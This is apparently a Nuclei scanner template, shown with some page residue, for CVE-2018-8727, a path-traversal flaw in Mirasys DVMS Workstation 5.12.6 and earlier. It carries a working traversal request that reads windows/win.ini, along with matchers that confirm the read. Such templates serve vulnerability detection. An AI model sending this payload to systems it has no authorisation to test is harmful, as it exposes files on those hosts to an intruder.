35 lines
964 B
YAML
35 lines
964 B
YAML
id: CVE-2018-8727
|
|
|
|
info:
|
|
name: Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion
|
|
author: 0x_akoko
|
|
severity: high
|
|
description: |
|
|
Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html
|
|
- https://www.onvio.nl/nieuws/cve-mirasys-vulnerability
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-8727
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-8727
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2018,mirasys,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/06/17
|